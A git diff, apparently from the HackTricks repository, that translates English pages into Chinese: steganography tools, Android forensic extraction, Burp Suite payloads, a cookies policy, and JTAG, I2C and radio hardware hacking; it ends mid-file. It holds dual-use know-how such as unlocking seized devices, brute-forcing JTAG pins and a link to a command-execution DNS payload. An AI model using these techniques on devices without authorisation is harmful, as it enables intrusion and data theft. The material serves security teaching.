-### **Pngcheck for PNG File Analysis**
-
-To analyze PNG files or to validate their authenticity, use:
+### **Pngcheck用于PNG文件分析**
 
+要分析PNG文件或验证其真实性，请使用：
 ```bash
 apt-get install pngcheck
 pngcheck stego.png
 ```
+### **图像分析的附加工具**
 
-### **Additional Tools for Image Analysis**
-
-For further exploration, consider visiting:
+要进一步探索，请考虑访问：
 
 - [Magic Eye Solver](http://magiceye.ecksdee.co.uk/)
 - [Image Error Level Analysis](https://29a.ch/sandbox/2012/imageerrorlevelanalysis/)
@@ -153,69 +133,62 @@ For further exploration, consider visiting:
 - [OpenStego](https://www.openstego.com/)
 - [DIIT](https://diit.sourceforge.net/)
 
-## **Extracting Data from Audios**
+## **从音频中提取数据**
 
-**Audio steganography** offers a unique method to conceal information within sound files. Different tools are utilized for embedding or retrieving hidden content.
+**音频隐写术**提供了一种独特的方法，将信息隐藏在声音文件中。使用不同的工具来嵌入或检索隐藏的内容。
 
 ### **Steghide (JPEG, BMP, WAV, AU)**
 
-Steghide is a versatile tool designed for hiding data in JPEG, BMP, WAV, and AU files. Detailed instructions are provided in the [stego tricks documentation](stego-tricks.md#steghide).
+Steghide是一个多功能工具，旨在将数据隐藏在JPEG、BMP、WAV和AU文件中。详细说明请参见[stego tricks documentation](stego-tricks.md#steghide)。
 
 ### **Stegpy (PNG, BMP, GIF, WebP, WAV)**
 
-This tool is compatible with a variety of formats including PNG, BMP, GIF, WebP, and WAV. For more information, refer to [Stegpy's section](stego-tricks.md#stegpy-png-bmp-gif-webp-wav).
+该工具兼容多种格式，包括PNG、BMP、GIF、WebP和WAV。有关更多信息，请参阅[Stegpy's section](stego-tricks.md#stegpy-png-bmp-gif-webp-wav)。
 
 ### **ffmpeg**
 
-ffmpeg is crucial for assessing the integrity of audio files, highlighting detailed information and pinpointing any discrepancies.
-
+ffmpeg对于评估音频文件的完整性至关重要，突出详细信息并指出任何差异。
 ```bash
 ffmpeg -v info -i stego.mp3 -f null -
 ```
-
 ### **WavSteg (WAV)**
 
-WavSteg excels in concealing and extracting data within WAV files using the least significant bit strategy. It is accessible on [GitHub](https://github.com/ragibson/Steganography#WavSteg). Commands include:
-
+WavSteg 擅长使用最低有效位策略在 WAV 文件中隐藏和提取数据。它可以在 [GitHub](https://github.com/ragibson/Steganography#WavSteg) 上获取。命令包括：
 ```bash
 python3 WavSteg.py -r -b 1 -s soundfile -o outputfile
 
 python3 WavSteg.py -r -b 2 -s soundfile -o outputfile
 ```
-
 ### **Deepsound**
 
-Deepsound allows for the encryption and detection of information within sound files using AES-256. It can be downloaded from [the official page](http://jpinsoft.net/deepsound/download.aspx).
+Deepsound 允许使用 AES-256 对声音文件中的信息进行加密和检测。可以从 [the official page](http://jpinsoft.net/deepsound/download.aspx) 下载。
 
 ### **Sonic Visualizer**
 
-An invaluable tool for visual and analytical inspection of audio files, Sonic Visualizer can unveil hidden elements undetectable by other means. Visit the [official website](https://www.sonicvisualiser.org/) for more.
+Sonic Visualizer 是一个用于音频文件的视觉和分析检查的宝贵工具，可以揭示其他方法无法检测到的隐藏元素。访问 [official website](https://www.sonicvisualiser.org/) 了解更多信息。
 
 ### **DTMF Tones - Dial Tones**
 
-Detecting DTMF tones in audio files can be achieved through online tools such as [this DTMF detector](https://unframework.github.io/dtmf-detect/) and [DialABC](http://dialabc.com/sound/detect/index.html).
+通过在线工具可以检测音频文件中的 DTMF 音调，例如 [this DTMF detector](https://unframework.github.io/dtmf-detect/) 和 [DialABC](http://dialabc.com/sound/detect/index.html)。
 
 ## **Other Techniques**
 
 ### **Binary Length SQRT - QR Code**
 
-Binary data that squares to a whole number might represent a QR code. Use this snippet to check:
-
+平方为整数的二进制数据可能表示 QR 码。使用此代码片段进行检查：
 ```python
 import math
 math.sqrt(2500) #50
 ```
+对于二进制到图像的转换，请查看 [dcode](https://www.dcode.fr/binary-image)。要读取二维码，请使用 [this online barcode reader](https://online-barcode-reader.inliteresearch.com/)。
 
-For binary to image conversion, check [dcode](https://www.dcode.fr/binary-image). To read QR codes, use [this online barcode reader](https://online-barcode-reader.inliteresearch.com/).
+### **盲文翻译**
 
-### **Braille Translation**
+对于盲文翻译，[Branah Braille Translator](https://www.branah.com/braille-translator) 是一个优秀的资源。
 
-For translating Braille, the [Branah Braille Translator](https://www.branah.com/braille-translator) is an excellent resource.
-
-## **References**
+## **参考文献**
 
 - [**https://0xrick.github.io/lists/stego/**](https://0xrick.github.io/lists/stego/)
 - [**https://github.com/DominicBreuker/stego-toolkit**](https://github.com/DominicBreuker/stego-toolkit)
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/todo/6881-udp-pentesting-bittorrent.md b/src/todo/6881-udp-pentesting-bittorrent.md
index e94bb9223..b58833f93 100644
--- a/src/todo/6881-udp-pentesting-bittorrent.md
+++ b/src/todo/6881-udp-pentesting-bittorrent.md
@@ -1,4 +1,3 @@
 {{#include ../banners/hacktricks-training.md}}
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/todo/android-forensics.md b/src/todo/android-forensics.md
index 4baba3332..3e4b8e6e1 100644
--- a/src/todo/android-forensics.md
+++ b/src/todo/android-forensics.md
@@ -2,27 +2,26 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-## Locked Device
+## 锁定设备
 
-To start extracting data from an Android device it has to be unlocked. If it's locked you can:
+要开始从 Android 设备提取数据，设备必须解锁。如果设备被锁定，您可以：
 
-- Check if the device has debugging via USB activated.
-- Check for a possible [smudge attack](https://www.usenix.org/legacy/event/woot10/tech/full_papers/Aviv.pdf)
-- Try with [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/)
+- 检查设备是否已通过 USB 激活调试。
+- 检查是否存在可能的 [smudge attack](https://www.usenix.org/legacy/event/woot10/tech/full_papers/Aviv.pdf)
+- 尝试使用 [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/)
 
-## Data Adquisition
+## 数据获取
 
-Create an [android backup using adb](../mobile-pentesting/android-app-pentesting/adb-commands.md#backup) and extract it using [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/): `java -jar abe.jar unpack file.backup file.tar`
+使用 adb 创建 [android backup](../mobile-pentesting/android-app-pentesting/adb-commands.md#backup) 并使用 [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/) 提取：`java -jar abe.jar unpack file.backup file.tar`
 
-### If root access or physical connection to JTAG interface
+### 如果有 root 访问或物理连接到 JTAG 接口
 
-- `cat /proc/partitions` (search the path to the flash memory, generally the first entry is _mmcblk0_ and corresponds to the whole flash memory).
-- `df /data` (Discover the block size of the system).
-- dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (execute it with the information gathered from the block size).
+- `cat /proc/partitions`（搜索闪存的路径，通常第一个条目是 _mmcblk0_，对应整个闪存）。
+- `df /data`（发现系统的块大小）。
+- dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096（使用从块大小收集的信息执行）。
 
-### Memory
+### 内存
 
-Use Linux Memory Extractor (LiME) to extract the RAM information. It's a kernel extension that should be loaded via adb.
+使用 Linux Memory Extractor (LiME) 提取 RAM 信息。这是一个应该通过 adb 加载的内核扩展。
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/todo/burp-suite.md b/src/todo/burp-suite.md
index 24d0abbc0..ae6b91495 100644
--- a/src/todo/burp-suite.md
+++ b/src/todo/burp-suite.md
@@ -1,18 +1,17 @@
 {{#include ../banners/hacktricks-training.md}}
 
-# Basic Payloads
+# 基本有效载荷
 
-- **Simple List:** Just a list containing an entry in each line
-- **Runtime File:** A list read in runtime (not loaded in memory). For supporting big lists.
-- **Case Modification:** Apply some changes to a list of strings(No change, to lower, to UPPER, to Proper name - First capitalized and the rest to lower-, to Proper Name -First capitalized an the rest remains the same-.
-- **Numbers:** Generate numbers from X to Y using Z step or randomly.
-- **Brute Forcer:** Character set, min & max length.
+- **简单列表：** 仅包含每行一个条目的列表
+- **运行时文件：** 在运行时读取的列表（不加载到内存中）。用于支持大列表。
+- **大小写修改：** 对字符串列表应用一些更改（不变，转为小写，转为大写，转为专有名词 - 首字母大写，其余小写 -，转为专有名词 - 首字母大写，其余保持不变）。
+- **数字：** 使用 Z 步长或随机生成从 X 到 Y 的数字。
+- **暴力破解：** 字符集，最小和最大长度。
 
-[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload to execute commands and grab the output via DNS requests to burpcollab.
+[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : 用于执行命令并通过 DNS 请求获取输出的有效载荷到 burpcollab。
 
 {% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %}
 
 [https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator)
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/todo/cookies-policy.md b/src/todo/cookies-policy.md
index 8b7ee8459..ce37b57f2 100644
--- a/src/todo/cookies-policy.md
+++ b/src/todo/cookies-policy.md
@@ -1,47 +1,45 @@
 # Cookies Policy
 
-Last updated: 02/04/2023
+最后更新：02/04/2023
 
-### Introduction
+### 介绍
 
-This Cookies Policy applies to the following websites owned and operated by HackTricks team ("HackTricks", "we", "us" or "our"):
+本Cookies政策适用于HackTricks团队（“HackTricks”，“我们”，“我们”或“我们的”）拥有和运营的以下网站：
 
 * hacktricks.xyz
 * [www.hacktricks.xyz](http://www.hacktricks.xyz/)
 * book.hacktricks.xyz
 * cloud.hacktricks.xyz
 
-By using any of these websites, you agree to the use of cookies in accordance with this Cookies Policy. If you do not agree, please disable cookies in your browser settings or refrain from using our websites.
+通过使用这些网站中的任何一个，您同意根据本Cookies政策使用cookies。如果您不同意，请在浏览器设置中禁用cookies或避免使用我们的网站。
 
-### What are cookies?
+### 什么是cookies？
 
-Cookies are small text files that are stored on your computer or mobile device when you visit a website. They are widely used to make websites work, improve their functionality, and provide a more personalized user experience.
+Cookies是当您访问网站时存储在您的计算机或移动设备上的小文本文件。它们被广泛用于使网站正常工作、改善其功能并提供更个性化的用户体验。
 
-### How we use cookies
+### 我们如何使用cookies
 
-We use cookies on our websites for the following purposes:
+我们在网站上使用cookies的目的如下：
 
-1. Essential cookies: These cookies are necessary for the basic functionality of our websites, such as enabling user authentication, maintaining security, and remembering your preferences.
-2. Performance cookies: These cookies help us understand how visitors interact with our websites, by collecting and reporting information anonymously. This allows us to improve our website performance and user experience.
-3. Functionality cookies: These cookies enable our websites to remember choices you make, such as your language or region, to provide a more personalized experience.
-4. Targeting/advertising cookies: These cookies are used to deliver relevant ads and marketing communications based on your interests, browsing history, and interactions with our websites.
+1. 必需的cookies：这些cookies对于我们网站的基本功能是必要的，例如启用用户身份验证、维护安全性和记住您的偏好设置。
+2. 性能cookies：这些cookies帮助我们了解访客如何与我们的网站互动，通过匿名收集和报告信息。这使我们能够改善网站性能和用户体验。
+3. 功能性cookies：这些cookies使我们的网站能够记住您所做的选择，例如您的语言或地区，以提供更个性化的体验。
+4. 定向/广告cookies：这些cookies用于根据您的兴趣、浏览历史和与我们网站的互动提供相关广告和营销通讯。
 
-Moreover, the pages book.hacktricks.xyz and cloud.hacktricks.xyz are hosted in Gitbook. You can find more information about Gitbooks cookies in [https://gitbook-1652864889.teamtailor.com/cookie-policy](https://gitbook-1652864889.teamtailor.com/cookie-policy).
+此外，页面book.hacktricks.xyz和cloud.hacktricks.xyz托管在Gitbook上。您可以在[https://gitbook-1652864889.teamtailor.com/cookie-policy](https://gitbook-1652864889.teamtailor.com/cookie-policy)找到有关Gitbook cookies的更多信息。
 
-### Third-party cookies
+### 第三方cookies
 
-In addition to our own cookies, we may also use third-party cookies to report website usage statistics, deliver advertisements, and enable social media sharing buttons. The use of third-party cookies is subject to their respective privacy policies.
+除了我们自己的cookies，我们还可能使用第三方cookies来报告网站使用统计信息、投放广告和启用社交媒体分享按钮。使用第三方cookies受其各自隐私政策的约束。
 
-Managing cookies
+管理cookies
 
-Most web browsers allow you to manage cookies through their settings. You can choose to block, delete, or limit the use of cookies on your device. However, please note that disabling cookies may affect the functionality and performance of our websites.
+大多数网页浏览器允许您通过其设置管理cookies。您可以选择阻止、删除或限制设备上cookies的使用。然而，请注意，禁用cookies可能会影响我们网站的功能和性能。
 
-Changes to this Cookies Policy
+本Cookies政策的变更
 
-We may update this Cookies Policy from time to time to reflect changes in our practices or relevant laws. We encourage you to periodically review this page for the latest information on our cookie practices.
-
-### Contact us
-
-If you have any questions or concerns about this Cookies Policy, please contact us at [support@hacktricks.xyz](mailto:support@hacktricks.xyz)
+我们可能会不时更新本Cookies政策，以反映我们做法或相关法律的变化。我们鼓励您定期查看此页面，以获取有关我们cookie做法的最新信息。
 
+### 联系我们
 
+如果您对本Cookies政策有任何疑问或担忧，请通过[support@hacktricks.xyz](mailto:support@hacktricks.xyz)与我们联系。
diff --git a/src/todo/hardware-hacking/README.md b/src/todo/hardware-hacking/README.md
index 85c0219a2..4b739bc2a 100644
--- a/src/todo/hardware-hacking/README.md
+++ b/src/todo/hardware-hacking/README.md
@@ -1,53 +1,52 @@
-# Hardware Hacking
+# 硬件黑客
 
 {{#include ../../banners/hacktricks-training.md}}
 
 ## JTAG
 
-JTAG allows to perform a boundary scan. The boundary scan analyzes certain circuitry, including embedded boundary-scan cells and registers for each pin.
+JTAG 允许执行边界扫描。边界扫描分析某些电路，包括每个引脚的嵌入式边界扫描单元和寄存器。
 
-The JTAG standard defines **specific commands for conducting boundary scans**, including the following:
+JTAG 标准定义了 **进行边界扫描的特定命令**，包括以下内容：
 
-- **BYPASS** allows you to test a specific chip without the overhead of passing through other chips.
-- **SAMPLE/PRELOAD** takes a sample of the data entering and leaving the device when it’s in its normal functioning mode.
-- **EXTEST** sets and reads pin states.
+- **BYPASS** 允许您测试特定芯片，而无需通过其他芯片。
+- **SAMPLE/PRELOAD** 在设备正常工作模式下，获取进入和离开设备的数据样本。
+- **EXTEST** 设置和读取引脚状态。
 
-It can also support other commands such as:
+它还可以支持其他命令，例如：
 
-- **IDCODE** for identifying a device
-- **INTEST** for the internal testing of the device
+- **IDCODE** 用于识别设备
+- **INTEST** 用于设备的内部测试
 
-You might come across these instructions when you use a tool like the JTAGulator.
+当您使用像 JTAGulator 这样的工具时，可能会遇到这些指令。
 
-### The Test Access Port
+### 测试访问端口
 
-Boundary scans include tests of the four-wire **Test Access Port (TAP)**, a general-purpose port that provides **access to the JTAG test support** functions built into a component. TAP uses the following five signals:
+边界扫描包括对四线 **测试访问端口 (TAP)** 的测试，这是一个通用端口，提供 **对 JTAG 测试支持** 功能的访问。TAP 使用以下五个信号：
 
-- Test clock input (**TCK**) The TCK is the **clock** that defines how often the TAP controller will take a single action (in other words, jump to the next state in the state machine).
-- Test mode select (**TMS**) input TMS controls the **finite state machine**. On each beat of the clock, the device’s JTAG TAP controller checks the voltage on the TMS pin. If the voltage is below a certain threshold, the signal is considered low and interpreted as 0, whereas if the voltage is above a certain threshold, the signal is considered high and interpreted as 1.
-- Test data input (**TDI**) TDI is the pin that sends **data into the chip through the scan cells**. Each vendor is responsible for defining the communication protocol over this pin, because JTAG doesn’t define this.
-- Test data output (**TDO**) TDO is the pin that sends **data out of the chip**.
-- Test reset (**TRST**) input The optional TRST resets the finite state machine **to a known good state**. Alternatively, if the TMS is held at 1 for five consecutive clock cycles, it invokes a reset, the same way the TRST pin would, which is why TRST is optional.
+- 测试时钟输入 (**TCK**) TCK 是定义 TAP 控制器将执行单个操作的频率的 **时钟**（换句话说，跳转到状态机中的下一个状态）。
+- 测试模式选择 (**TMS**) 输入 TMS 控制 **有限状态机**。在每个时钟脉冲上，设备的 JTAG TAP 控制器检查 TMS 引脚上的电压。如果电压低于某个阈值，则信号被视为低并解释为 0；如果电压高于某个阈值，则信号被视为高并解释为 1。
+- 测试数据输入 (**TDI**) TDI 是将 **数据通过扫描单元发送到芯片** 的引脚。每个供应商负责定义该引脚上的通信协议，因为 JTAG 并未定义此内容。
+- 测试数据输出 (**TDO**) TDO 是将 **数据从芯片发送出去** 的引脚。
+- 测试复位 (**TRST**) 输入 可选的 TRST 将有限状态机 **重置为已知良好状态**。或者，如果 TMS 在连续五个时钟周期内保持为 1，则会调用复位，方式与 TRST 引脚相同，这就是 TRST 是可选的原因。
 
-Sometimes you will be able to find those pins marked in the PCB. In other occasions you might need to **find them**.
+有时您可以在 PCB 上找到这些引脚的标记。在其他情况下，您可能需要 **找到它们**。
 
-### Identifying JTAG pins
+### 识别 JTAG 引脚
 
-The fastest but most expensive way to detect JTAG ports is by using the **JTAGulator**, a device created specifically for this purpose (although it can **also detect UART pinouts**).
+检测 JTAG 端口的最快但最昂贵的方法是使用 **JTAGulator**，这是一种专门为此目的创建的设备（尽管它也 **可以检测 UART 引脚**）。
 
-It has **24 channels** you can connect to the boards pins. Then it performs a **BF attack** of all the possible combinations sending **IDCODE** and **BYPASS** boundary scan commands. If it receives a response, it displays the channel corresponding to each JTAG signal
+它有 **24 个通道**，您可以将其连接到电路板引脚。然后，它执行 **BF 攻击**，发送所有可能组合的 **IDCODE** 和 **BYPASS** 边界扫描命令。如果收到响应，它会显示每个 JTAG 信号对应的通道。
 
-A cheaper but much slower way of identifying JTAG pinouts is by using the [**JTAGenum**](https://github.com/cyphunk/JTAGenum/) loaded on an Arduino-compatible microcontroller.
+一种更便宜但速度较慢的识别 JTAG 引脚的方法是使用 [**JTAGenum**](https://github.com/cyphunk/JTAGenum/) 加载在 Arduino 兼容的微控制器上。
 
-Using **JTAGenum**, you’d first **define the pins of the probing** device that you’ll use for the enumeration.You’d have to reference the device’s pinout diagram, and then connect these pins with the test points on your target device.
+使用 **JTAGenum**，您首先需要 **定义您将用于枚举的探测设备的引脚**。您需要参考设备的引脚图，然后将这些引脚与目标设备上的测试点连接。
 
-A **third way** to identify JTAG pins is by **inspecting the PCB** for one of the pinouts. In some cases, PCBs might conveniently provide the **Tag-Connect interface**, which is a clear indication that the board has a JTAG connector, too. You can see what that interface looks like at [https://www.tag-connect.com/info/](https://www.tag-connect.com/info/). Additionally, inspecting the **datasheets of the chipsets on the PCB** might reveal pinout diagrams that point to JTAG interfaces.
+识别 JTAG 引脚的 **第三种方法** 是通过 **检查 PCB** 中的引脚图。在某些情况下，PCB 可能方便地提供 **Tag-Connect 接口**，这清楚地表明该电路板也具有 JTAG 连接器。您可以在 [https://www.tag-connect.com/info/](https://www.tag-connect.com/info/) 查看该接口的外观。此外，检查 PCB 上芯片组的 **数据表** 可能会揭示指向 JTAG 接口的引脚图。
 
 ## SDW
 
-SWD is an ARM-specific protocol designed for debugging.
+SWD 是一种专为调试设计的 ARM 特定协议。
 
-The SWD interface requires **two pins**: a bidirectional **SWDIO** signal, which is the equivalent of JTAG’s **TDI and TDO pins and a clock**, and **SWCLK**, which is the equivalent of **TCK** in JTAG. Many devices support the **Serial Wire or JTAG Debug Port (SWJ-DP)**, a combined JTAG and SWD interface that enables you to connect either a SWD or JTAG probe to the target.
+SWD 接口需要 **两个引脚**：一个双向的 **SWDIO** 信号，相当于 JTAG 的 **TDI 和 TDO 引脚** 以及一个时钟，和 **SWCLK**，相当于 JTAG 中的 **TCK**。许多设备支持 **串行线或 JTAG 调试端口 (SWJ-DP)**，这是一个结合了 JTAG 和 SWD 接口的接口，允许您将 SWD 或 JTAG 探头连接到目标。
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/todo/hardware-hacking/fault_injection_attacks.md b/src/todo/hardware-hacking/fault_injection_attacks.md
index 0d7c35bd5..9c8351982 100644
--- a/src/todo/hardware-hacking/fault_injection_attacks.md
+++ b/src/todo/hardware-hacking/fault_injection_attacks.md
@@ -1,7 +1,5 @@
-# Fault Injection Attacks 
-
-Fault injections attacks includes introducing external distrubance in electronic circuits to influence it's behaviour, resulting to disclose information or even bypass certian restrictions in the circuit. This attacks opens a lot of possibilities for attacking electronic circuits. This attack is also referred as glitching of electronic circuits.
-
-There are a lot of methods and mediums for injecting fault into an electronic circuit. 
+# Fault Injection Attacks
 
+故障注入攻击包括在电子电路中引入外部干扰以影响其行为，从而泄露信息或甚至绕过电路中的某些限制。这种攻击为攻击电子电路打开了许多可能性。这种攻击也被称为电子电路的故障。
 
+有很多方法和媒介可以向电子电路注入故障。
diff --git a/src/todo/hardware-hacking/i2c.md b/src/todo/hardware-hacking/i2c.md
index 9252b3078..34ad27327 100644
--- a/src/todo/hardware-hacking/i2c.md
+++ b/src/todo/hardware-hacking/i2c.md
@@ -4,8 +4,7 @@
 
 ## Bus Pirate
 
-To test a Bus Pirate is working, connect +5V with VPU and 3.3V with ADC and access the bus pirate (Using Tera Term for example) and use the command `~`:
-
+要测试 Bus Pirate 是否正常工作，将 +5V 连接到 VPU，将 3.3V 连接到 ADC，然后访问 Bus Pirate（例如使用 Tera Term），并使用命令 `~`：
 ```bash
 # Use command
 HiZ>~
@@ -44,20 +43,18 @@ Any key to exit
 #Press space
 Found 0 errors.
 ```
+如您在前面的命令行中看到的，它显示找到 0 个错误。这在购买后或刷新固件后确认其正常工作时非常有用。
 
-As you can see in the previous command line it said that it found 0 errors. This is very useful to know it's working after buying it or after flashing a firmware.
-
-To connect with the bus pirate you can follow the docs:
+要连接到 bus pirate，您可以参考文档：
 
 ![](<../../images/image (484).png>)
 
-In this case I'm going to connect to an EPROM: ATMEL901 24C256 PU27:
+在这种情况下，我将连接到一个 EPROM：ATMEL901 24C256 PU27：
 
 ![](<../../images/image (964).png>)
 
-To talk with bus pirate I used Tera Term connected to the pirate bus COM port with a Setup --> Serial Port --> Speed of 115200.\
-In the following communication you can find how to prepare the bus pirate to talk I2C and how to write and read from the memory (Comments appear using "#", don't expect that part in the communication):
-
+为了与 bus pirate 通信，我使用 Tera Term 连接到 pirate bus COM 端口，设置为 Setup --> Serial Port --> Speed 为 115200。\
+在以下通信中，您可以找到如何准备 bus pirate 以进行 I2C 通信，以及如何从内存中写入和读取（注释使用 "#" 出现，不要期待通信中包含该部分）：
 ```bash
 # Check communication with buspirate
 i
@@ -94,16 +91,16 @@ x. exit(without change)
 # Select I2C
 (1)>4
 I2C mode:
- 1. Software
- 2. Hardware
+1. Software
+2. Hardware
 
 # Select Software mode
 (1)>1
 Set speed:
- 1. ~5kHz
- 2. ~50kHz
- 3. ~100kHz
- 4. ~240kHz
+1. ~5kHz
+2. ~50kHz
+3. ~100kHz
+4. ~240kHz
 
 # Select communication spped
 (1)> 2
@@ -118,9 +115,9 @@ Clutch engaged!!!
 
 # Get macros
 I2C>(0)
- 0.Macro menu
- 1.7bit address search
- 2.I2C sniffer
+0.Macro menu
+1.7bit address search
+2.I2C sniffer
 
 #Get addresses of slaves connected
 I2C>(1)
@@ -156,13 +153,11 @@ WRITE: 0xA1 ACK
 READ: 0x42  ACK 0x42  ACK 0x42  ACK 0x20  ACK 0x48  ACK 0x69  ACK 0x20  ACK 0x44  ACK 0x72  ACK 0x65  ACK 0x67  ACK 0x21  ACK 0x20  ACK 0x41  ACK 0x41  ACK 0x41  ACK 0x00  ACK 0xFF  ACK 0xFF  ACK 0xFF
 NACK
 ```
-
 ### Sniffer
 
-In this scenario we are going to sniff the I2C communication between the arduino and the previous EPROM, you just need to communicate both devices and then connect the bus pirate to the SCL, SDA and GND pins:
+在这个场景中，我们将嗅探 Arduino 和之前的 EPROM 之间的 I2C 通信，您只需将两个设备连接起来，然后将总线海盗连接到 SCL、SDA 和 GND 引脚：
 
 ![](<../../images/image (166).png>)
-
 ```bash
 I2C>m
 1. HiZ
@@ -180,15 +175,15 @@ x. exit(without change)
 
 (1)>4
 I2C mode:
- 1. Software
- 2. Hardware
+1. Software
+2. Hardware
 
 (1)>1
 Set speed:
- 1. ~5kHz
- 2. ~50kHz
- 3. ~100kHz
- 4. ~240kHz
+1. ~5kHz
+2. ~50kHz
+3. ~100kHz
+4. ~240kHz
 
 (1)>1
 Clutch disengaged!!!
@@ -208,6 +203,4 @@ Sniffer
 Any key to exit
 [0xA0+0x00+0x69+0x41+0x41+0x41+0x20+0x48+0x69+0x20+0x44+0x72+0x65+0x67+0x21+0x20+0x41+0x41+0x41+0x00+]
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/todo/hardware-hacking/jtag.md b/src/todo/hardware-hacking/jtag.md
index f0aa21727..bf9bb089b 100644
--- a/src/todo/hardware-hacking/jtag.md
+++ b/src/todo/hardware-hacking/jtag.md
@@ -4,24 +4,23 @@
 
 ## JTAGenum
 
-[**JTAGenum** ](https://github.com/cyphunk/JTAGenum)is a tool can be used with a Raspberry PI or an Arduino to find to try JTAG pins from an unknown chip.\
-In the **Arduino**, connect the **pins from 2 to 11 to 10pins potentially belonging to a JTAG**. Load the program in the Arduino and it will try to bruteforce all the pins to find if any pins belongs to JTAG and which one is each.\
-In the **Raspberry PI** you can only use **pins from 1 to 6** (6pins, so you will go slower testing each potential JTAG pin).
+[**JTAGenum** ](https://github.com/cyphunk/JTAGenum)是一个可以与Raspberry PI或Arduino一起使用的工具，用于尝试从未知芯片中找到JTAG引脚。\
+在**Arduino**中，将**引脚2到11连接到10个可能属于JTAG的引脚**。在Arduino中加载程序，它将尝试暴力破解所有引脚，以找出是否有引脚属于JTAG以及每个引脚的具体情况。\
+在**Raspberry PI**中，您只能使用**引脚1到6**（6个引脚，因此测试每个潜在JTAG引脚的速度会更慢）。
 
 ### Arduino
 
-In Arduino, after connecting the cables (pin 2 to 11 to JTAG pins and Arduino GND to the baseboard GND), **load the JTAGenum program in Arduino** and in the Serial Monitor send a **`h`** (command for help) and you should see the help:
+在Arduino中，连接电缆后（引脚2到11连接到JTAG引脚，Arduino GND连接到主板GND），**在Arduino中加载JTAGenum程序**，并在串口监视器中发送**`h`**（帮助命令），您应该会看到帮助信息：
 
 ![](<../../images/image (939).png>)
 
 ![](<../../images/image (578).png>)
 
-Configure **"No line ending" and 115200baud**.\
-Send the command s to start scanning:
+配置**“无行结束符”和115200波特率**。\
+发送命令s以开始扫描：
 
 ![](<../../images/image (774).png>)
 
-If you are contacting a JTAG, you will find one or several **lines starting by FOUND!** indicating the pins of JTAG.
+如果您正在连接JTAG，您将找到一行或多行以FOUND!开头的**行，指示JTAG的引脚**。
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/todo/hardware-hacking/radio.md b/src/todo/hardware-hacking/radio.md
index ecbe4ef9f..af15c46b7 100644
--- a/src/todo/hardware-hacking/radio.md
+++ b/src/todo/hardware-hacking/radio.md
@@ -4,63 +4,63 @@
 
 ## SigDigger
 
-[**SigDigger** ](https://github.com/BatchDrake/SigDigger)is a free digital signal analyzer for GNU/Linux and macOS, designed to extract information of unknown radio signals. It supports a variety of SDR devices through SoapySDR, and allows adjustable demodulation of FSK, PSK and ASK signals, decode analog video, analyze bursty signals and listen to analog voice channels (all in real time).
+[**SigDigger** ](https://github.com/BatchDrake/SigDigger)是一个免费的数字信号分析仪，适用于GNU/Linux和macOS，旨在提取未知无线电信号的信息。它通过SoapySDR支持多种SDR设备，并允许可调的FSK、PSK和ASK信号解调，解码模拟视频，分析突发信号并实时收听模拟语音通道。
 
 ### Basic Config
 
-After installing there are a few things that you could consider configuring.\
-In settings (the second tab button) you can select the **SDR device** or **select a file** to read and which frequency to syntonise and the Sample rate (recommended to up to 2.56Msps if your PC support it)\\
+安装后，有一些您可以考虑配置的内容。\
+在设置（第二个选项卡按钮）中，您可以选择**SDR设备**或**选择一个文件**进行读取，以及要调谐的频率和采样率（如果您的PC支持，建议最高可达2.56Msps）\\
 
 ![](<../../images/image (245).png>)
 
-In the GUI behaviour it's recommended to enable a few things if your PC support it:
+在GUI行为中，如果您的PC支持，建议启用一些选项：
 
 ![](<../../images/image (472).png>)
 
 > [!NOTE]
-> If you realise that your PC is not capturing things try to disable OpenGL and lowering the sample rate.
+> 如果您发现您的PC没有捕获到信号，请尝试禁用OpenGL并降低采样率。
 
 ### Uses
 
-- Just to **capture some time of a signal and analyze it** just maintain the button "Push to capture" as long as you need.
+- 只需**捕获信号的一段时间并分析它**，只需按住“Push to capture”按钮，直到您需要的时间。
 
 ![](<../../images/image (960).png>)
 
-- The **Tuner** of SigDigger helps to **capture better signals** (but it can also degrade them). Ideally start with 0 and keep **making it bigger until** you find the **noise** introduce is **bigger** than the **improvement of the signal** you need).
+- SigDigger的**调谐器**有助于**捕获更好的信号**（但也可能会降低信号质量）。理想情况下，从0开始，继续**增大**，直到您发现引入的**噪声**大于您所需的**信号改善**。
 
 ![](<../../images/image (1099).png>)
 
 ### Synchronize with radio channel
 
-With [**SigDigger** ](https://github.com/BatchDrake/SigDigger)synchronize with the channel you want to hear, configure "Baseband audio preview" option, configure the bandwith to get all the info being sent and then set the Tuner to the level before the noise is really starting to increase:
+使用[**SigDigger** ](https://github.com/BatchDrake/SigDigger)与您想要收听的频道同步，配置“基带音频预览”选项，配置带宽以获取所有发送的信息，然后将调谐器设置到噪声真正开始增加之前的水平：
 
 ![](<../../images/image (585).png>)
 
 ## Interesting tricks
 
-- When a device is sending bursts of information, usually the **first part is going to be a preamble** so you **don't** need to **worry** if you **don't find information** in there **or if there are some errors** there.
-- In frames of information you usually should **find different frames well aligned between them**:
+- 当设备发送信息突发时，通常**第一部分是前导码**，因此您**不必担心**如果您**没有找到信息**或**那里有一些错误**。
+- 在信息帧中，您通常应该**找到不同的帧彼此对齐**：
 
 ![](<../../images/image (1076).png>)
 
 ![](<../../images/image (597).png>)
 
-- **After recovering the bits you might need to process them someway**. For example, in Manchester codification a up+down will be a 1 or 0 and a down+up will be the other one. So pairs of 1s and 0s (ups and downs) will be a real 1 or a real 0.
